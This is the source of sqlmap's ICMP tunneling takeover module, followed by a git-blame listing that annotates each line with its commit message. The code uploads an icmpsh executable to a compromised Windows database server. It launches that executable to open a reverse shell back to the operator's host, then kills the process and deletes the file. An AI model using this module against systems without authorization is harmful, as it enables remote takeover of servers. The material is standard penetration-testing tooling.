sqlmap/lib/takeover/icmpsh.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import os
import time

from extra.icmpsh.icmpsh_m import main as icmpshmaster
from lib.core.common import getLocalIP
from lib.core.common import getRemoteIP
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import logger
from lib.core.data import paths


class ICMPsh:
    """
    This class defines methods to call icmpsh for plugins.
    """

    def _initVars(self):
        self.lhostStr = None
        self.rhostStr = None
        self.localIP = getLocalIP()
        self.remoteIP = getRemoteIP()
        self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_"))

    def _selectRhost(self):
        message = "what is the back-end DBMS address? [%s] " % self.remoteIP
        address = readInput(message, default=self.remoteIP)

        return address

    def _selectLhost(self):
        message = "what is the local address? [%s] " % self.localIP
        address = readInput(message, default=self.localIP)

        return address

    def _prepareIngredients(self, encode=True):
        self.lhostStr = ICMPsh._selectLhost(self)
        self.rhostStr = ICMPsh._selectRhost(self)

    def _runIcmpshMaster(self):
        infoMsg = "running icmpsh master locally"
        logger.info(infoMsg)

        icmpshmaster(self.lhostStr, self.rhostStr)

    def _runIcmpshSlaveRemote(self):
        infoMsg = "running icmpsh slave remotely"
        logger.info(infoMsg)

        cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr)

        self.execCmd(cmd, silent=True)

    def uploadIcmpshSlave(self, web=False):
        ICMPsh._initVars(self)
        self._randStr = randomStr(lowercase=True)
        self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr

        if web:
            self._icmpslaveRemote = "%s/%s" % (self.webDirectory, self._icmpslaveRemoteBase)
        else:
            self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase)

        self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))

        logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)

        if web:
            self.webUpload(self._icmpslaveRemote, self.webDirectory, filepath=self._icmpslave)
        else:
            self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary")

    def icmpPwn(self):
        ICMPsh._prepareIngredients(self)
        self._runIcmpshSlaveRemote()
        self._runIcmpshMaster()

        debugMsg = "icmpsh master exited"
        logger.debug(debugMsg)

        time.sleep(1)
        self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True)
        time.sleep(1)
        self.delRemoteFile(self._icmpslaveRemote)
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`#!/usr/bin/env python`

			`"""`
modified homepage address 2012-07-12 21:38:03 +04:00			`Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`See the file 'doc/COPYING' for copying permission`
			`"""`

			`import os`
			`import time`

			`from extra.icmpsh.icmpsh_m import main as icmpshmaster`
			`from lib.core.common import getLocalIP`
			`from lib.core.common import getRemoteIP`
			`from lib.core.common import normalizePath`
			`from lib.core.common import ntToPosixSlashes`
			`from lib.core.common import randomStr`
			`from lib.core.common import readInput`
			`from lib.core.data import conf`
			`from lib.core.data import logger`
			`from lib.core.data import paths`


			`class ICMPsh:`
			`"""`
			`This class defines methods to call icmpsh for plugins.`
			`"""`

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _initVars(self):`
Minor code restyling 2011-04-30 17:20:05 +04:00			`self.lhostStr = None`
			`self.rhostStr = None`
			`self.localIP = getLocalIP()`
			`self.remoteIP = getRemoteIP()`
Implementation for an Issue #295 2013-01-07 18:55:40 +04:00			`self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_"))`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _selectRhost(self):`
Minor language fix 2012-10-23 17:52:43 +04:00			`message = "what is the back-end DBMS address? [%s] " % self.remoteIP`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`address = readInput(message, default=self.remoteIP)`

			`return address`

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _selectLhost(self):`
Minor language fix 2012-10-23 17:52:43 +04:00			`message = "what is the local address? [%s] " % self.localIP`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`address = readInput(message, default=self.localIP)`

			`return address`

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _prepareIngredients(self, encode=True):`
Fix for an --os-pwn with ICMPsh (it was crashing because methods interleaved with Metasploit ones) 2013-01-07 19:44:22 +04:00			`self.lhostStr = ICMPsh._selectLhost(self)`
			`self.rhostStr = ICMPsh._selectRhost(self)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _runIcmpshMaster(self):`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`infoMsg = "running icmpsh master locally"`
			`logger.info(infoMsg)`

			`icmpshmaster(self.lhostStr, self.rhostStr)`

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`def _runIcmpshSlaveRemote(self):`
Minor code restyling 2011-04-30 17:20:05 +04:00			`infoMsg = "running icmpsh slave remotely"`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`logger.info(infoMsg)`

Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
			`self.execCmd(cmd, silent=True)`

			`def uploadIcmpshSlave(self, web=False):`
Fix for an Issue #318 2012-12-21 14:10:05 +04:00			`ICMPsh._initVars(self)`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self._randStr = randomStr(lowercase=True)`
			`self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
			`if web:`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self._icmpslaveRemote = "%s/%s" % (self.webDirectory, self._icmpslaveRemoteBase)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`else:`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
			`if web:`
Fix for an Issue #318 2012-12-21 14:10:05 +04:00			`self.webUpload(self._icmpslaveRemote, self.webDirectory, filepath=self._icmpslave)`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`else:`
Fix for an Issue #318 2012-12-21 14:10:05 +04:00			`self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary")`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
			`def icmpPwn(self):`
Fix for an --os-pwn with ICMPsh (it was crashing because methods interleaved with Metasploit ones) 2013-01-07 19:44:22 +04:00			`ICMPsh._prepareIngredients(self)`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self._runIcmpshSlaveRemote()`
			`self._runIcmpshMaster()`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00
Minor code restyling 2011-04-30 17:20:05 +04:00			`debugMsg = "icmpsh master exited"`
Implemented ICMP tunneling for out-of-band takeover (--os-pwn) as an alternative to TCP tunneling (Metasploit). It relies on icmpsh, the back-end dbms server has to be Windows as the icmpsh slave runs on Windows only for the moment. sqlmap needs to be executed as root to work. 2010-10-28 01:02:22 +04:00			`logger.debug(debugMsg)`

Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`time.sleep(1)`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True)`
Minor bug fix to properly delete sqlmap temporary files on the database server file system at shutdown. Minor improvements at ICMPsh tunnel to cleanup properly the dbms at shutdown and avoid checking/writing sys_bineval() UDF as it's a PE and needs to be called by sys_exec() only. Got rid of useless doubleslash param in delRemoteFile() method. Major code refactoring to xp_cmdshell.py methods and parent calls. 2010-10-28 04:19:40 +04:00			`time.sleep(1)`
Doing some more style updating (capitalization of exception classes; using _ is enough for private members - __ is used in Python specific methods) 2012-12-06 17:14:19 +04:00			`self.delRemoteFile(self._icmpslaveRemote)`